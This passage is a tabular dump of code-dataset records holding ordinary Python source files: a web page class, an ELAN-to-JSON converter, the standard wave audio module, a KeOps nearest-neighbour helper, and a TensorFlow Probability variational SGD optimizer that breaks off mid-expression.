hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a222f92ec445d5938034f74c1ec399f735f6e4e | 730 | py | Python | saas/web/page.py | nattvara/saas | 766b538ac90daa8f8eadce8a1fd43f83413610de | [
"MIT"
] | 2 | 2019-01-18T16:14:03.000Z | 2019-04-12T13:27:50.000Z | saas/web/page.py | nattvara/saas | 766b538ac90daa8f8eadce8a1fd43f83413610de | [
"MIT"
] | null | null | null | saas/web/page.py | nattvara/saas | 766b538ac90daa8f8eadce8a1fd43f83413610de | [
"MIT"
] | null | null | null | """Page module."""
from __future__ import annotations
from saas.web.url import Url
class Page:
"""Page class."""
def __init__(self):
"""Create new page."""
self.urls = []
self.status_code = None
self.content_type = ''
def add_url(self, url: Url):
"""Add url.
Args:
url: Url to add
"""
self.urls.append(url)
def remove_urls_not_from_domain(self, domain: str):
"""Remove urls not from given domain.
Args:
domain: domain urls should be from
"""
cleaned = []
for url in self.urls:
if url.domain == domain:
cleaned.append(url)
self.urls = cleaned
| 20.857143 | 55 | 0.527397 |
4a2232f4eef7580109caa54742166aaeb0e94d30 | 7,651 | py | Python | elpis/engines/common/input/elan_to_json.py | guillaume-wisniewski/elpis | 550c350fd0098751b9a502a253bc4066f15c47db | [
"Apache-2.0"
] | 118 | 2018-11-25T22:00:11.000Z | 2022-03-18T10:18:33.000Z | elpis/engines/common/input/elan_to_json.py | guillaume-wisniewski/elpis | 550c350fd0098751b9a502a253bc4066f15c47db | [
"Apache-2.0"
] | 189 | 2019-01-25T01:37:59.000Z | 2022-02-16T02:31:23.000Z | elpis/engines/common/input/elan_to_json.py | guillaume-wisniewski/elpis | 550c350fd0098751b9a502a253bc4066f15c47db | [
"Apache-2.0"
] | 34 | 2018-11-28T20:31:38.000Z | 2022-01-27T12:20:59.000Z | #!/usr/bin/python3
"""
Get all files in the repository can use recursive atm as long as we don't need numpy
pass in corpus path throw an error if matching file wav isn't found in the corpus directory
Usage: python3 elan_to_json.py [-h] [-i INPUT_DIR] [-o OUTPUT_DIR] [-t TIER] [-j OUTPUT_JSON]
Copyright: University of Queensland, 2019
Contributors:
Nicholas Lambourne - (The University of Queensland, 2018)
"""
import argparse
import glob
import os
import sys
from typing import List, Dict, Tuple, Optional
from pympi.Elan import Eaf
from ..utilities import load_json_file, write_data_to_json_file
def save_tier_info(input_eaf: Eaf = None,
file_name: str = '',
tier_types: Optional[List] = None,
corpus_tiers_file: str = 'corpus_tiers.json'):
tiers = []
tier_types = tier_types or list()
for tier_type in tier_types:
tier_names = input_eaf.get_tier_ids_for_linguistic_type(tier_type)
tiers.append({tier_type: tier_names})
file_data = {"file": file_name, "tiers": tiers}
corpus_tiers = load_json_file(corpus_tiers_file)
corpus_tiers.append(file_data)
write_data_to_json_file(data=corpus_tiers,
file_name=corpus_tiers_file)
def process_eaf(input_elan_file: str = '',
tier_order: int = 0,
tier_type: str = '',
tier_name: str = '',
corpus_tiers_file: str = '') -> List[dict]:
"""
Method to process a particular tier in an eaf file (ELAN Annotation Format).
Transcriptions are read from an elan file tier.
Tiers are nodes from the tree structure in the .eaf file.
The tier to read from is determined by tier order (eg top tier would be order 1),
tier type (eg default-lt) or tier name (eg Phrase).
If tier type is used, the first tier matching this type is used.
Elan can have multiple tiers of same type, future work would support reading data
from multiple tiers of the selected type.
It stores the transcriptions in the following format:
{'speaker_id': <speaker_id>,
'audio_file_name': <file_name>,
'transcript': <transcription_label>,
'start_ms': <start_time_in_milliseconds>,
'stop_ms': <stop_time_in_milliseconds>}
:param input_elan_file: name of input elan file
:param tier_order: index of the elan tier to process
:param tier_type: type of the elan tier to process
:param tier_name: name of the elan tier to process
:param corpus_tiers_file list of all
:return: a list of dictionaries, where each dictionary is an annotation
"""
print(f"processing eaf {input_elan_file} using {tier_order} {tier_type} {tier_name}")
# Get paths to files
input_directory, full_file_name = os.path.split(input_elan_file)
file_name, extension = os.path.splitext(full_file_name)
# Look for wav file matching the eaf file in same directory
if os.path.isfile(os.path.join(input_directory, file_name + ".wav")):
print("WAV file found for " + file_name, file=sys.stderr)
else:
raise ValueError(f"WAV file not found for {full_file_name}. "
f"Please put it next to the eaf file in {input_directory}.")
# Get tier data from Elan file
input_eaf = Eaf(input_elan_file)
tier_types: List[str] = list(input_eaf.get_linguistic_type_names())
tier_names: List[str] = list(input_eaf.get_tier_names())
# Keep this data handy for future corpus analysis
save_tier_info(input_eaf=input_eaf,
tier_types=tier_types,
file_name=file_name,
corpus_tiers_file=corpus_tiers_file)
# Get annotations and parameters (things like speaker id) on the target tier
annotations: List[Tuple[str, str, str]] = []
annotations_data: List[dict] = []
# First try using tier order to get tier name
if tier_order:
# Watch out for files that may not have this many tiers
# tier_order is 1-index but List indexing is 0-index
try:
tier_name = tier_names[tier_order - 1]
print(f"using tier order {tier_order} to get tier name {tier_name}")
except IndexError:
print("couldn't find a tier")
pass
else:
# else use tier type to get a tier name
if tier_type in tier_types:
print(f"found tier type {tier_type}")
tier_names = input_eaf.get_tier_ids_for_linguistic_type(tier_type)
tier_name = tier_names[0]
if tier_name:
print(f"found tier name {tier_name}")
else:
print("tier type not found in this file")
if tier_name in tier_names:
print(f"using tier name {tier_name}")
annotations = input_eaf.get_annotation_data_for_tier(tier_name)
if annotations:
print(f"annotations {annotations}")
annotations = sorted(annotations)
parameters: Dict[str, str] = input_eaf.get_parameters_for_tier(tier_name)
print(f"parameters {parameters}")
speaker_id: str = parameters.get("PARTICIPANT", "")
for annotation in annotations:
start: str = annotation[0]
end: str = annotation[1]
annotation_text: str = annotation[2]
print(f"annotation {annotation} {start} {end}")
obj = {
"audio_file_name": f"{file_name}.wav",
"transcript": annotation_text,
"start_ms": start,
"stop_ms": end
}
if "PARTICIPANT" in parameters:
obj["speaker_id"] = speaker_id
annotations_data.append(obj)
return annotations_data
def main():
"""
Run the entire elan_to_json.py as a command line utility. It extracts information on speaker, audio file,
transcription etc. from the given tier of the specified .eaf file.
Usage: python3 elan_to_json.py [-h] [-i INPUT_DIR] [-o OUTPUT_DIR] [-t TIER] [-j OUTPUT_JSON]
"""
parser: argparse.ArgumentParser = argparse.ArgumentParser(
description="This script takes an directory with ELAN files and "
"slices the audio and output text in a format ready "
"for our Kaldi pipeline.")
parser.add_argument("-i", "--input_dir",
help="Directory of dirty audio and eaf files",
default="working_dir/input/data/")
parser.add_argument("-o", "--output_dir",
help="Output directory",
default="../input/output/tmp/")
parser.add_argument("-t", "--tier",
help="Target language tier name",
default="Phrase")
parser.add_argument("-j", "--output_json",
help="File path to output json")
arguments: argparse.Namespace = parser.parse_args()
# Build output directory if needed
if not os.path.exists(arguments.output_dir):
os.makedirs(arguments.output_dir)
all_files_in_directory = set(glob.glob(os.path.join(arguments.input_dir, "**"), recursive=True))
input_elan_files = [file_ for file_ in all_files_in_directory if file_.endswith(".eaf")]
annotations_data = []
for input_elan_file in input_elan_files:
annotations_data.extend(process_eaf(input_elan_file=input_elan_file,
tier_name=arguments.tier))
write_data_to_json_file(data=annotations_data,
file_name=arguments.output_json)
if __name__ == "__main__":
main()
| 39.642487 | 109 | 0.640047 |
4a223451bf9c345df19c6f5ae9b3a4d81a51fdf4 | 18,579 | py | Python | Lib/wave.py | deadsnakes/python3.3 | 4faaf44cd5478410ac3b977351c1965fa054b5e9 | [
"PSF-2.0"
] | 652 | 2015-07-26T00:00:17.000Z | 2022-02-24T18:30:04.000Z | Lib/wave.py | deadsnakes/python3.3 | 4faaf44cd5478410ac3b977351c1965fa054b5e9 | [
"PSF-2.0"
] | 8 | 2015-09-07T03:38:19.000Z | 2021-05-23T03:18:51.000Z | check-python33-manual/samples/standard_library_337/Lib/wave.py | DaveKaretnyk/parsing-utils2 | 40085bbd399fa605f2f2a4708d385a64ffc907de | [
"MIT"
] | 40 | 2015-07-24T19:45:08.000Z | 2021-11-01T14:54:56.000Z | """Stuff to parse WAVE files.
Usage.
Reading WAVE files:
f = wave.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' for linear samples)
getcompname() -- returns human-readable version of
compression type ('not compressed' linear samples)
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing WAVE files:
f = wave.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)
-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
-- write audio frames without pathing up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, perhaps possibly the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
import builtins
__all__ = ["open", "openfp", "Error"]
class Error(Exception):
pass
WAVE_FORMAT_PCM = 0x0001
_array_fmts = None, 'b', 'h', None, 'i'
import struct
import sys
from chunk import Chunk
def _byteswap3(data):
ba = bytearray(data)
ba[::3] = data[2::3]
ba[2::3] = data[::3]
return bytes(ba)
class Wave_read:
"""Variables used in this class:
These variables are available to the user though appropriate
methods of this class:
_file -- the open file with methods read(), close(), and seek()
set through the __init__() method
_nchannels -- the number of audio channels
available through the getnchannels() method
_nframes -- the number of audio frames
available through the getnframes() method
_sampwidth -- the number of bytes per audio sample
available through the getsampwidth() method
_framerate -- the sampling frequency
available through the getframerate() method
_comptype -- the AIFF-C compression type ('NONE' if AIFF)
available through the getcomptype() method
_compname -- the human-readable AIFF-C compression type
available through the getcomptype() method
_soundpos -- the position in the audio stream
available through the tell() method, set through the
setpos() method
These variables are used internally only:
_fmt_chunk_read -- 1 iff the FMT chunk has been read
_data_seek_needed -- 1 iff positioned correctly in audio
file for readframes()
_data_chunk -- instantiation of a chunk class for the DATA chunk
_framesize -- size of one frame in the file
"""
def initfp(self, file):
self._convert = None
self._soundpos = 0
self._file = Chunk(file, bigendian = 0)
if self._file.getname() != b'RIFF':
raise Error('file does not start with RIFF id')
if self._file.read(4) != b'WAVE':
raise Error('not a WAVE file')
self._fmt_chunk_read = 0
self._data_chunk = None
while 1:
self._data_seek_needed = 1
try:
chunk = Chunk(self._file, bigendian = 0)
except EOFError:
break
chunkname = chunk.getname()
if chunkname == b'fmt ':
self._read_fmt_chunk(chunk)
self._fmt_chunk_read = 1
elif chunkname == b'data':
if not self._fmt_chunk_read:
raise Error('data chunk before fmt chunk')
self._data_chunk = chunk
self._nframes = chunk.chunksize // self._framesize
self._data_seek_needed = 0
break
chunk.skip()
if not self._fmt_chunk_read or not self._data_chunk:
raise Error('fmt chunk and/or data chunk missing')
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, str):
f = builtins.open(f, 'rb')
self._i_opened_the_file = f
# else, assume it is an open file object already
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def __del__(self):
self.close()
#
# User visible methods.
#
def getfp(self):
return self._file
def rewind(self):
self._data_seek_needed = 1
self._soundpos = 0
def close(self):
if self._i_opened_the_file:
self._i_opened_the_file.close()
self._i_opened_the_file = None
self._file = None
def tell(self):
return self._soundpos
def getnchannels(self):
return self._nchannels
def getnframes(self):
return self._nframes
def getsampwidth(self):
return self._sampwidth
def getframerate(self):
return self._framerate
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def getparams(self):
return self.getnchannels(), self.getsampwidth(), \
self.getframerate(), self.getnframes(), \
self.getcomptype(), self.getcompname()
def getmarkers(self):
return None
def getmark(self, id):
raise Error('no marks')
def setpos(self, pos):
if pos < 0 or pos > self._nframes:
raise Error('position not in range')
self._soundpos = pos
self._data_seek_needed = 1
def readframes(self, nframes):
if self._data_seek_needed:
self._data_chunk.seek(0, 0)
pos = self._soundpos * self._framesize
if pos:
self._data_chunk.seek(pos, 0)
self._data_seek_needed = 0
if nframes == 0:
return b''
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
# unfortunately the fromfile() method does not take
# something that only looks like a file object, so
# we have to reach into the innards of the chunk object
import array
chunk = self._data_chunk
data = array.array(_array_fmts[self._sampwidth])
assert data.itemsize == self._sampwidth
nitems = nframes * self._nchannels
if nitems * self._sampwidth > chunk.chunksize - chunk.size_read:
nitems = (chunk.chunksize - chunk.size_read) // self._sampwidth
data.fromfile(chunk.file.file, nitems)
# "tell" data chunk how much was read
chunk.size_read = chunk.size_read + nitems * self._sampwidth
# do the same for the outermost chunk
chunk = chunk.file
chunk.size_read = chunk.size_read + nitems * self._sampwidth
data.byteswap()
data = data.tobytes()
else:
data = self._data_chunk.read(nframes * self._framesize)
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
if self._convert and data:
data = self._convert(data)
self._soundpos = self._soundpos + len(data) // (self._nchannels * self._sampwidth)
return data
#
# Internal methods.
#
def _read_fmt_chunk(self, chunk):
wFormatTag, self._nchannels, self._framerate, dwAvgBytesPerSec, wBlockAlign = struct.unpack_from('<HHLLH', chunk.read(14))
if wFormatTag == WAVE_FORMAT_PCM:
sampwidth = struct.unpack_from('<H', chunk.read(2))[0]
self._sampwidth = (sampwidth + 7) // 8
else:
raise Error('unknown format: %r' % (wFormatTag,))
self._framesize = self._nchannels * self._sampwidth
self._comptype = 'NONE'
self._compname = 'not compressed'
class Wave_write:
"""Variables used in this class:
These variables are user settable through appropriate methods
of this class:
_file -- the open file with methods write(), close(), tell(), seek()
set through the __init__() method
_comptype -- the AIFF-C compression type ('NONE' in AIFF)
set through the setcomptype() or setparams() method
_compname -- the human-readable AIFF-C compression type
set through the setcomptype() or setparams() method
_nchannels -- the number of audio channels
set through the setnchannels() or setparams() method
_sampwidth -- the number of bytes per audio sample
set through the setsampwidth() or setparams() method
_framerate -- the sampling frequency
set through the setframerate() or setparams() method
_nframes -- the number of audio frames written to the header
set through the setnframes() or setparams() method
These variables are used internally only:
_datalength -- the size of the audio samples written to the header
_nframeswritten -- the number of frames actually written
_datawritten -- the size of the audio samples actually written
"""
def __init__(self, f):
self._i_opened_the_file = None
if isinstance(f, str):
f = builtins.open(f, 'wb')
self._i_opened_the_file = f
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
def initfp(self, file):
self._file = file
self._convert = None
self._nchannels = 0
self._sampwidth = 0
self._framerate = 0
self._nframes = 0
self._nframeswritten = 0
self._datawritten = 0
self._datalength = 0
self._headerwritten = False
def __del__(self):
self.close()
#
# User visible methods.
#
def setnchannels(self, nchannels):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if nchannels < 1:
raise Error('bad # of channels')
self._nchannels = nchannels
def getnchannels(self):
if not self._nchannels:
raise Error('number of channels not set')
return self._nchannels
def setsampwidth(self, sampwidth):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if sampwidth < 1 or sampwidth > 4:
raise Error('bad sample width')
self._sampwidth = sampwidth
def getsampwidth(self):
if not self._sampwidth:
raise Error('sample width not set')
return self._sampwidth
def setframerate(self, framerate):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if framerate <= 0:
raise Error('bad frame rate')
self._framerate = int(round(framerate))
def getframerate(self):
if not self._framerate:
raise Error('frame rate not set')
return self._framerate
def setnframes(self, nframes):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
self._nframes = nframes
def getnframes(self):
return self._nframeswritten
def setcomptype(self, comptype, compname):
if self._datawritten:
raise Error('cannot change parameters after starting to write')
if comptype not in ('NONE',):
raise Error('unsupported compression type')
self._comptype = comptype
self._compname = compname
def getcomptype(self):
return self._comptype
def getcompname(self):
return self._compname
def setparams(self, params):
nchannels, sampwidth, framerate, nframes, comptype, compname = params
if self._datawritten:
raise Error('cannot change parameters after starting to write')
self.setnchannels(nchannels)
self.setsampwidth(sampwidth)
self.setframerate(framerate)
self.setnframes(nframes)
self.setcomptype(comptype, compname)
def getparams(self):
if not self._nchannels or not self._sampwidth or not self._framerate:
raise Error('not all parameters set')
return self._nchannels, self._sampwidth, self._framerate, \
self._nframes, self._comptype, self._compname
def setmark(self, id, pos, name):
raise Error('setmark() not supported')
def getmark(self, id):
raise Error('no marks')
def getmarkers(self):
return None
def tell(self):
return self._nframeswritten
def writeframesraw(self, data):
self._ensure_header_written(len(data))
nframes = len(data) // (self._sampwidth * self._nchannels)
if self._convert:
data = self._convert(data)
if self._sampwidth in (2, 4) and sys.byteorder == 'big':
import array
a = array.array(_array_fmts[self._sampwidth])
a.frombytes(data)
data = a
assert data.itemsize == self._sampwidth
data.byteswap()
data.tofile(self._file)
self._datawritten = self._datawritten + len(data) * self._sampwidth
else:
if self._sampwidth == 3 and sys.byteorder == 'big':
data = _byteswap3(data)
self._file.write(data)
self._datawritten = self._datawritten + len(data)
self._nframeswritten = self._nframeswritten + nframes
def writeframes(self, data):
self.writeframesraw(data)
if self._datalength != self._datawritten:
self._patchheader()
def close(self):
if self._file:
try:
self._ensure_header_written(0)
if self._datalength != self._datawritten:
self._patchheader()
self._file.flush()
finally:
self._file = None
if self._i_opened_the_file:
self._i_opened_the_file.close()
self._i_opened_the_file = None
#
# Internal methods.
#
def _ensure_header_written(self, datasize):
if not self._headerwritten:
if not self._nchannels:
raise Error('# channels not specified')
if not self._sampwidth:
raise Error('sample width not specified')
if not self._framerate:
raise Error('sampling rate not specified')
self._write_header(datasize)
def _write_header(self, initlength):
assert not self._headerwritten
self._file.write(b'RIFF')
if not self._nframes:
self._nframes = initlength // (self._nchannels * self._sampwidth)
self._datalength = self._nframes * self._nchannels * self._sampwidth
self._form_length_pos = self._file.tell()
self._file.write(struct.pack('<L4s4sLHHLLHH4s',
36 + self._datalength, b'WAVE', b'fmt ', 16,
WAVE_FORMAT_PCM, self._nchannels, self._framerate,
self._nchannels * self._framerate * self._sampwidth,
self._nchannels * self._sampwidth,
self._sampwidth * 8, b'data'))
self._data_length_pos = self._file.tell()
self._file.write(struct.pack('<L', self._datalength))
self._headerwritten = True
def _patchheader(self):
assert self._headerwritten
if self._datawritten == self._datalength:
return
curpos = self._file.tell()
self._file.seek(self._form_length_pos, 0)
self._file.write(struct.pack('<L', 36 + self._datawritten))
self._file.seek(self._data_length_pos, 0)
self._file.write(struct.pack('<L', self._datawritten))
self._file.seek(curpos, 0)
self._datalength = self._datawritten
def open(f, mode=None):
if mode is None:
if hasattr(f, 'mode'):
mode = f.mode
else:
mode = 'rb'
if mode in ('r', 'rb'):
return Wave_read(f)
elif mode in ('w', 'wb'):
return Wave_write(f)
else:
raise Error("mode must be 'r', 'rb', 'w', or 'wb'")
openfp = open # B/W compatibility
| 36.005814 | 130 | 0.609452 |
4a2234d0d209f36820a470401f8a2a8e1fed1045 | 581 | py | Python | densities/keops_base.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | 2 | 2020-08-24T15:59:59.000Z | 2020-08-24T17:03:30.000Z | densities/keops_base.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | densities/keops_base.py | willwhitney/exploration-reimplementation | 5e2ca54119529b8bf9235bfbad92e38a6781fbd5 | [
"Apache-2.0"
] | null | null | null | import torch
from matplotlib import pyplot as plt
from pykeops.torch import LazyTensor
use_cuda = torch.cuda.is_available()
tensor = torch.cuda.FloatTensor if use_cuda else torch.FloatTensor
def new(dim):
return None
def update_batch(index, data):
data = tensor(data)
X_j = LazyTensor(data[None, :, :])
return X_j
def get_nn_batch(index, queries, n_neighbors=16):
X_j = index
X_i = LazyTensor(tensor(queries)[:, None, :])
D_ij = ((X_i - X_j) ** 2).sum(-1)
return D_ij.argKmin(n_neighbors, dim=1)
def convert_array(x):
return tensor(x)
| 20.034483 | 66 | 0.690189 |
4a22369444402ccb3f23f36de36bc390898f245c | 10,844 | py | Python | tensorflow_probability/python/optimizer/variational_sgd.py | PavanKishore21/probability | 4bad1b796b0e6ed2959205915d42788817620c4c | [
"Apache-2.0"
] | 2 | 2019-10-30T04:45:07.000Z | 2019-10-30T04:45:08.000Z | tensorflow_probability/python/optimizer/variational_sgd.py | PavanKishore21/probability | 4bad1b796b0e6ed2959205915d42788817620c4c | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/optimizer/variational_sgd.py | PavanKishore21/probability | 4bad1b796b0e6ed2959205915d42788817620c4c | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""An optimizer module for constant stochastic gradient descent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import assert_util
from tensorflow_probability.python.internal import distribution_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow.python.training import training_ops
__all__ = [
'VariationalSGD',
]
class VariationalSGD(tf.optimizers.Optimizer):
"""An optimizer module for constant stochastic gradient descent.
This implements an optimizer module for the constant stochastic gradient
descent algorithm [(Mandt et al., 2017)][1]. The optimization variable is
regarded as an approximate sample from the posterior .
Note: If a prior is included in the loss, it should be scaled by
`1/num_pseudo_batches`, where num_pseudo_batches is the number of minibatches
in the data. I.e., it should be divided by the `num_pseudo_batches` term
described below.
Args:
batch_size: Scalar `int`-like `Tensor`. The number of examples in a
minibatch in the data set. Note: Assumes the loss is taken as the mean
over a minibatch. Otherwise if the sum was taken set this to 1.
total_num_examples: Scalar `int`-like `Tensor`. The total number of examples
in the data set.
max_learning_rate: Scalar `float`-like `Tensor`. A maximum allowable
effective coordinate-wise learning rate. The algorithm scales down any
effective learning rate (i.e. after preconditioning) that is larger than
this. (Default: `1`)
preconditioner_decay_rate: Scalar `float`-like `Tensor`. The exponential
decay rate of the rescaling of the preconditioner (RMSprop). (This is
"alpha" in Mandt et al. (2017)). Should be smaller than but nearly `1` to
approximate sampling from the posterior. (Default: `0.95`)
burnin: Scalar `int`-like `Tensor`. The number of iterations to collect
gradient statistics to update the preconditioner before starting to draw
noisy samples. (Default: `25`)
burnin_max_learning_rate: Scalar `float`-like `Tensor`. Maximum learning
rate to use during the burnin period.
(Default: `1e-8`)
use_single_learning_rate: Boolean Indicates whether one single learning
rate is used or coordinate_wise learning rates are used.
(Default: `False`)
name: Python `str` describing ops managed by this function.
(Default: `"VariationalSGD"`)
Raises:
InvalidArgumentError: If preconditioner_decay_rate is a `Tensor` not in
`(0,1]`.
#### References
[1]: Stephan Mandt, Matthew D. Hoffman, and David M. Blei. Stochastic
Gradient Descent as Approximate Bayesian Inference. _arXiv preprint
arXiv:1704.04289_, 2017. https://arxiv.org/abs/1704.04289
"""
def __init__(self,
batch_size,
total_num_examples,
max_learning_rate=1.,
preconditioner_decay_rate=0.95,
burnin=25,
burnin_max_learning_rate=1e-6,
use_single_learning_rate=False,
name=None):
default_name = 'VariationalSGD'
with tf.name_scope(name or default_name):
self._preconditioner_decay_rate = tf.convert_to_tensor(
preconditioner_decay_rate, name='preconditioner_decay_rate')
self._batch_size = tf.convert_to_tensor(
batch_size, name='batch_size')
self._total_num_examples = tf.convert_to_tensor(
total_num_examples, name='total_num_examples')
self._burnin = tf.convert_to_tensor(
burnin,
name='burnin',
dtype=dtype_util.common_dtype([burnin], dtype_hint=tf.int64))
self._burnin_max_learning_rate = tf.convert_to_tensor(
burnin_max_learning_rate, name='burnin_max_learning_rate')
self._max_learning_rate = tf.convert_to_tensor(
max_learning_rate, name='max_learning_rate')
self._use_single_learning_rate = use_single_learning_rate
self._preconditioner_decay_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._preconditioner_decay_rate,
message='`preconditioner_decay_rate` must be non-negative'),
assert_util.assert_less_equal(
self._preconditioner_decay_rate,
1.,
message='`preconditioner_decay_rate` must be at most 1.'),
], self._preconditioner_decay_rate)
self._batch_size = distribution_util.with_dependencies([
assert_util.assert_greater(
self._batch_size,
0,
message='`batch_size` must be greater than zero')
], self._batch_size)
self._total_num_examples = distribution_util.with_dependencies([
assert_util.assert_greater(
self._total_num_examples,
0,
message='`total_num_examples` must be greater than zero')
], self._total_num_examples)
self._burnin = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._burnin, message='`burnin` must be non-negative'),
assert_util.assert_integer(
self._burnin, message='`burnin` must be an integer')
], self._burnin)
self._burnin_max_learning_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._burnin_max_learning_rate,
message='`burnin_max_learning_rate` must be non-negative')
], self._burnin_max_learning_rate)
self._max_learning_rate = distribution_util.with_dependencies([
assert_util.assert_non_negative(
self._max_learning_rate,
message='`max_learning_rate` must be non-negative')
], self._max_learning_rate)
super(VariationalSGD, self).__init__(name=name or default_name)
def get_config(self):
# TODO(b/124800185): Consider migrating `max_learning_rate`, `burnin`,
# `preconditioner_decay_rate` and other properties into optimizer
# hyperparameters.
pass
def _create_slots(self, var_list):
for var in var_list:
self.add_slot(var, 'first_moment', 'zeros')
self.add_slot(var, 'second_moment', 'zeros')
def _prepare(self, var_list):
self._decay_tensor = tf.convert_to_tensor(
self._preconditioner_decay_rate, name='preconditioner_decay_rate')
self._batch_size_tensor = tf.convert_to_tensor(
self._batch_size, name='batch_size_tensor')
super(VariationalSGD, self)._prepare(var_list)
def _get_coordinatewise_learning_rate(self, grad, var):
# Compute the learning rate using a moving average for the diagonal of BB^T
avg_first = self.get_slot(var, 'first_moment')
avg_second = self.get_slot(var, 'second_moment')
decay_tensor = tf.cast(self._decay_tensor, var.dtype)
batch_size = tf.cast(self._batch_size_tensor, var.dtype)
# Create an estimator for the moving average of gradient mean and variance
# via Welford's algorithm
if isinstance(grad, tf.Tensor):
delta = grad - avg_first
first_moment_update = avg_first.assign_add(
delta * tf.where(
self.iterations < 1,
dtype_util.as_numpy_dtype(var.dtype)(1.),
1. - decay_tensor))
with tf.control_dependencies([first_moment_update]):
second_moment_update = avg_second.assign_add(
tf.cast(self.iterations < 1, var.dtype) * -(1. - decay_tensor) *
(avg_second - decay_tensor * tf.square(delta)))
diag_preconditioner = distribution_util.with_dependencies(
[second_moment_update],
tf.clip_by_value(avg_second, 1e-12, 1e12))
elif isinstance(grad, tf.IndexedSlices):
delta = grad.values - tf.gather_nd(avg_first, grad.indices)
first_moment_update = tf.compat.v1.scatter_add(
avg_first, grad.indices,
delta * tf.where(
self.iterations < 1,
dtype_util.as_numpy_dtype(var.dtype)(1.),
1. - decay_tensor))
with tf.control_dependencies([first_moment_update]):
avg_second = tf.compat.v1.scatter_add(
avg_second, grad.indices,
tf.cast(self.iterations < 1, var.dtype) * -(1. - decay_tensor) *
(tf.gather_nd(avg_second, grad.indices) -
decay_tensor * tf.square(delta)))
avg_second = tf.gather_nd(avg_second, grad.indices)
# TODO(b/70783772): Needs dtype specific clipping.
diag_preconditioner = tf.clip_by_value(avg_second, 1e-12, 1e12)
else:
raise tf.errors.InvalidArgumentError(
None, None, 'grad must of type Tensor or IndexedSlice')
diag_preconditioner *= batch_size
if self._use_single_learning_rate:
diag_preconditioner = tf.reduce_mean(diag_preconditioner)
# From Theorem 2 Corollary 1 of Mandt et al. 2017
return 2. * batch_size / (
